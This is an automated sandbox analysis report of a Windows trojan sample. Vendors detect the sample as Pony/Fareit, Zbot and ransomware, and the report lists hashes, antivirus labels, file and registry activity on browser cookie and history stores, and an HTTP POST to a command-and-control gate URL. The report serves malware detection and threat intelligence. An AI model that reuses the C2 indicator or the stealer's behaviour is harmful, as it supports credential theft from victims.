Analysis Date: 2014-11-07 19:30:58
MD5: 4df2bc97ffc68cc603fcc6ba3fc6fa40
SHA1: a56584e34a66757e59fc14919d5c02d98031b65e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: e55fd83db98efed5568058d8d33cc46d sha1: 27f29e2f3816d2650725e2886121eedd59636036 size: 2048
Section: .rdata md5: 995edf1f9d1f6068e49d89ff599d4ccd sha1: 6f725caf8e4c15cf95f9dc559b3042d3dbec5702 size: 3584
Section: .orpc md5: 9b096a98627d717a33cb3c28f8373fff sha1: 61367fa3536f43a3af0e67fdbbe4f1215758350c size: 113664
Section: .adata md5: 0f343b0931126a20f133d67c2b018a3b sha1: 60cacbf3d72e1e7834203da608037b1bf83b40e8 size: 1024
Timestamp: 2013-06-16 11:22:34
PEhash: ba76886dfc18a8c6b27d4cfc0ea2af7018520662
IMPhash: 8c233171e044bce3d9f29a585aa75007
AV 360 Safe: Trojan.VIZ.Gen.1
AV Ad-Aware: Trojan.VIZ.Gen.1
AV Alwil (avast): Kryptik-MSC [Trj]
AV Arcabit (arcavir): Trojan.Ransom.Foreign.gxos
AV Authentium: W32/SuspPack.FP.gen!Eldorado
AV Avira (antivir): TR/Agent.6707251
AV BullGuard: Trojan.VIZ.Gen.1
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): TrojanPWS.Zbot.Gen
AV ClamAV: no_virus
AV Dr. Web: Trojan.PWS.StealerENT.3128
AV Emsisoft: Trojan.VIZ.Gen.1
AV Eset (nod32): Win32/Kryptik.BIJW
AV Fortinet: W32/Kryptik.BDPK!tr
AV Frisk (f-prot): W32/SuspPack.FP.gen!Eldorado
AV F-Secure: Trojan.VIZ.Gen.1
AV Grisoft (avg): Cryptic
AV Ikarus: Trojan-PSW.Win32.Tepfer
AV K7: Trojan ( 0040f5a81 )
AV Kaspersky: Trojan-Ransom.Win32.Foreign.gxos
AV MalwareBytes: Malware.Packer.ORPC
AV Mcafee: PWS-Zbot-FBDS!4DF2BC97FFC6
AV Microsoft Security Essentials: PWS:Win32/Fareit.gen!C
AV MicroWorld (escan): Trojan.VIZ.Gen.1
AV Norman: Trojan.VIZ.Gen.1
AV Rising: Trojan.Antii!564B
AV Sophos: Mal/EncPk-ALN
AV Symantec: Downloader.Ponik!gen2
AV Trend Micro: TROJ_MOSERAN.BMC
AV VirusBlokAda (vba32): Heur.Trojan.Hlux

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\WinRAR\HWID ➝ NULL
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Network Details:

DNS: dennissellsdowntown.com
Type: A
184.168.221.26
HTTP POST: http://dennissellsdowntown.com/ponyz/gate.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1031 ➝ 184.168.221.26:80
Flows TCP: 192.168.1.1:1032 ➝ 184.168.221.26:80
Flows TCP: 192.168.1.1:1033 ➝ 184.168.221.26:80
Flows TCP: 192.168.1.1:1034 ➝ 184.168.221.26:80
Flows TCP: 192.168.1.1:1035 ➝ 184.168.221.26:80
Flows TCP: 192.168.1.1:1036 ➝ 184.168.221.26:80
Flows TCP: 192.168.1.1:1037 ➝ 184.168.221.26:80
Flows TCP: 192.168.1.1:1038 ➝ 184.168.221.26:80

Strings
.adata
CreateFileMappingW
CreateMailslotA
CreatePipe
CreateSemaphoreW
DeleteFileA
DeviceIoControl
DllEnumClassObjects
FatalExit
GetACP
GetConsoleAliasA
GetModuleHandleW
GetProcessHeap
GetShortPathNameW
GetStringTypeW
InitializeCriticalSection
KERNEL32.dll
LoadLibraryA
MSHTML.dll
`.rdata
SetCurrentDirectoryA
SetEnvironmentVariableA
SetVolumeLabelW
ShowHTMLDialog
ShowModalDialog
ShowModelessHTMLDialog
This program must be run under Win32
VirtualAlloc
WriteConsoleW